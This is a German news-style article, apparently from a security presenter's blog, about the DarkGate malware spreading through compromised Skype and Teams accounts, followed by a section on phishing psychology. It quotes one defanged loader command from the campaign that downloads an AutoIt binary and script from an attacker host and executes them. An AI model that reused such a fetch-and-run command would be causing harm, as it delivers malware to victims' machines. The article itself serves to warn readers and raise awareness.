Hacker verteilen Malware über Microsoft Teams und Skype

Eine besonders tückische Malware mit dem Namen „DarkGate“ wird derzeit über Skype- und Teams-Konten übertragen. Hacker verteilen Malware über Microsoft Teams und Skype.

Zur Zeit läuft aktuell eine Hacker-Kampagne, bei der Cyberkriminelle Microsofts Kommunikationsplattformen Skype und Teams missbrauchen, um die Malware

zu verteilen, so der Ethical- Hacker Ralf Schmitz.

 Wie die Angriffe ablaufen und wie Sie sich schützen können erklärt  Ralf Schmitz.

Die Hacker nutzen kompromittierte Skype-Konten, um Nachrichten mit VBA-Loader-Skript-Anhängen zu verschicken, die sich als PDF-Dokument ausgeben.

Der Zugriff auf das Skype-Konto ermöglicht den Hackern, einen bestehenden Nachrichten-Thread zu kapern und die Dateien so zu benennen, dass sie zum Kontext des Chat-Verlaufs passen. Das ist sehr gefährlich. 

Was sich die Betroffenen auf ihren PC herunterladen, ist auf den ersten Blick somit nicht unbedingt zu erkennen.

Nicht alle Virenschutzprogramme erkennen diesen Angriff und so kann in kurzer Zeit eine Vielzahl von Rechnern / Handys infiziert werden, so Hacker Ralf Schmitz. 

So verbreitet sich diese Malware

Diesmal heißt die Malware  „DarkGate“ und verbreitet sich derzeit über Skype- und Teams-Konten.

Hacker verteilen Malware über Microsoft Teams und Skype

Die Masche dieser Malware ist diesmal besonders tückisch. Die Hacker versenden Nachrichten mit VBA-Loader-Skript-Anhängen, so z. B.

C:\Windows\System32\cmd.exe“ /c mkdir c:\zohn & cd /dc:\zohn & copy C:\windows\system32\curl.exe zohn.exe & zohn -o Autoit3.exe hxxp:/ /reactervnamnat[.]com:80 & zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz & Autoit3.exe BzpXNT.au3  

um die PCs ihrer Opfer mit der Schadsoftware zu infizieren.

Hacker verteilen Malware über Microsoft Teams und Skype
Hacker verteilen Malware über Microsoft Teams und Skype

Bestehende Nachrichtenverläufe werden nachgestellt und die Namen der Dateien so gestaltet, dass sie dem Kontext des Chatverlaufs entsprechen, schreibt dazu TrendMicro eine Sicherheitsfirma. 

Die Vorsichtsmaßnahme, nur Dateien von bekannten Kontakten anzunehmen, hilft also bei „DarkGate“ wenig. 

Ein großes Datenleck könnte dahinterstecken!

Es ist zur Zeit noch unklar, wie die Konten der Anwendungen kompromittiert wurden.

Es wird jedoch vermutet, dass dies entweder durch durchgesickerte Zugangsdaten in Untergrundforen oder durch die vorherige Kompromittierung der Mutterorganisation geschah.

Sicherheitstipp von Ethical-Hacker Ralf Schmitz!

Skype- und Teams-Nutzer*innen rät Ralf Schmitz ihre Sicherheitssoftware und Antivirenprogramme immer zu aktualisieren und auch wöchentliche Prüfungen auf Handy, PC, Tablet durchzuführen, um Schadsoftware auf den eigenen Geräten frühzeitig zu erkennen.

Auch Sicherheitsvorträge die solche Angriffe live einmal zeigen und die Ralf Schmitz regelmäßig in Deutschland anbietet, können die Sicherheit erhöhen.  

Auch Virenschutzsoftware von verschiedenen Herstellern, können helfen. Diese darf aber nicht zeitgleich auf allen Geräten ausgeführt werden.

Wenn  Opfer die präparierte Datei angeklickt haben, löst dies den Download und die Ausführung eines AutoIT-Skripts zum Starten der DarkGate-Malware aus. Der Hacker hat nach der erfolgreichen Installation der Malware dann mehrere Optionen.

So ließen sich Informationen stehlen und die Systeme mit verschiedenen Arten von Schadsoftware infizieren, darunter Ransomware, bösartige Fernsteuerungs-Tools und Crypto-Miner.

Außerdem wird gerade beobachtet, dass die Angreifer versuchten, die DarkGate-Malware via Microsoft Teams in Unternehmen und Finanzinstitute einzuschleusen, die den Dienst so konfiguriert haben, dass er Nachrichten von externen Usern akzeptiert. Dabei sendeten die Kriminellen ZIP-Archive mit einer LNK-Datei, die dazu dient, ein VBA-Skript auszuführen.

Das wichtigste Mittel, um Hackerangriffe zu verhindern, ist eine Menge Erfahrung im Netz und Sicherheitssoftware, um solche perfiden Angriffe zu verhindern.

Phishing-Mails und die neusten Tricks…

Es gibt ein paar Wahrheiten über Phishing-Mails: Erstens nerven sie, zweitens werden sie immer ausgefeilter, drittens sind sie eigentlich leicht als Betrugsversuche zu identifizieren. Und zuletzt: Darauf hereinfallen tun immer nur die anderen. Phishing-Mails und die neusten Tricks „Das würde mir doch nie passieren.“

Trotzdem wurde bereits die IT der Uni-Klinik in Düsseldorf komplett zum Stillstand gebracht. Operationen musste abgesagt werden, die Notaufnahme wurde überlastet. Hacker übernahmen sogar die Rechner der Kommunalverwaltung Anhalt-Bitterfeld. Es dauerte acht Monate, bis der Notbetrieb wieder aufgehoben werden konnte. Nur weil irgendjemand so einen blöden Link in einer E-Mail angeklickt hatte.

Phishing-Mails und die neusten Tricks...
Phishing-Mails und die neusten Tricks…

Was bewegt überhaupt Menschen, auf die Links in solchen Mails zu klicken, obwohl sie es besser wissen müssten? Liegt es an mangelndem Problembewusstsein der Mitarbeiterinnen und Mitarbeiter? An Langeweile? Ein Forscherteam der Friedrich-Alexander-Universität Erlangen ging dieser Frage nach und kam zu der Erkenntnis, dass der Hauptgrund schlichte Neugier ist, gepaart mit einem Inhalt, der einen Bezug zum Empfänger hat. Es ist also mehr ein psychologisches als ein technisches Phänomen.

Phishing-Mails und die neusten Tricks…

In dem zugrundeliegenden Experiment schickten die Wissenschaftler kurz nach Neujahr eine Mail an 1.200 Studentinnen und Studenten. Der Inhalt war ganz unverdächtig und lautete, die Silvesterparty sei toll gewesen und hier seien die Bilder davon. Zusammen mit dem Hinweis, man solle die Bilder niemandem zeigen, der nicht dabei war.

Ergebnisse ließen IT-Verantwortliche blass und Marketing-Spezialisten grün vor Neid werden.

Die Ergebnisse ließen IT-Verantwortliche blass und Marketing-Spezialisten grün vor Neid werden. Die Klickrate betrug stolze 25 Prozent. Also hatten ein Viertel der Adressaten den Link in der E-Mail angeklickt, obwohl die Fete nie stattgefunden hatte. Selbstredend, dass die Wissenschaftlerinnen und Wissenschaftler keinen Schaden anrichteten und lediglich verzeichneten, wer reingefallen war.

Hacker Ralf Schmitz berichtet….

Als man die Versuchspersonen später nach den Gründen für den Klick befragte, sagten 34 Prozent, sie seien einfach neugierig auf die Fotos gewesen, 27 Prozent nannten den passenden Zeitpunkt kurz nach Silvester und 16 Prozent meinten, die Absender-Adresse zu kennen. Diese Zahlen belegen nur den Eindruck, den Sicherheitsverantwortliche in den letzten Jahren gewinnen konnten: Gerade die Aussicht auf Bilder ließ die Angesprochenen auf Links klicken. Und je besser der Text in die gegenwärtige Situation des Empfängers passt, desto wahrscheinlicher ist die Aktion erfolgreich.

Erfolge der Cyber-Kriminellen sind fast schon vorprogrammiert.

Die Erfolge der Cyber-Kriminellen sind fast schon vorprogrammiert. Sie feilen nur noch am Kontext immer genauer. Mit ein wenig Recherche in Sozialen Medien, Facebook bietet sich da an, noch besser sind aber LinkedIn und Xing, ist es kein großer Aufwand, eine Mail auf den Empfänger maßzuschneidern. Wenn nämlich persönliche oder berufliche Details in der E-Mail auftauchen, Firmennamen oder Jobwechsel, lassen diese den Inhalt umso glaubhafter erscheinen. Selbst hier könnte Künstliche Intelligenz helfen, den Betrügern in Zukunft viel Handarbeit zu ersparen.

Die Leiterin der zuvor genannten Studie, Frau Dr. Benenson, sagt wohl zu Recht, dass mit sorgfältiger Planung und Ausführung jeder dazu gebracht werden kann, solch einen Link anzuklicken, und sei es nur aus Neugier. Oder aus Angst, weil angedroht wird, Konten zu sperren oder angeblich teure Bestellungen getätigt zu haben.

Die Cyber-Halunken wenden demnach ganz simple psychologische Tricks an, um die Opfer in die Falle zu locken.

Phishing-Mails wenden psychologische Tricks an!

Was also ist die Konsequenz für Unternehmen und Institute daraus? An einer entsprechenden Schulung der Mitarbeiter, in der sie für die Problematik sensibilisiert werden, führt kein Weg vorbei, dies gilt gerade für technisch weniger versierte Angestellte. Für private Nutzerinnen und Nutzer vielleicht dieser Tipp: Wenn es emotional wird, wenn Neugier oder Angst die Kontrolle übernehmen könnten, die Nachricht sofort löschen. Banken, Sparkassen und Online-Händler schicken niemals emotionale Angelhaken.

Noch fragen sie nach Kontodaten oder wollen persönliche Angaben. Doch, so schade es ist, gibt es keinen 100%-igen Schutz vor digitalem Betrug. Doch es hilft schon, sich einfach mit solchen Themen zu beschäftigen. Denn auch hier macht Übung den Meister.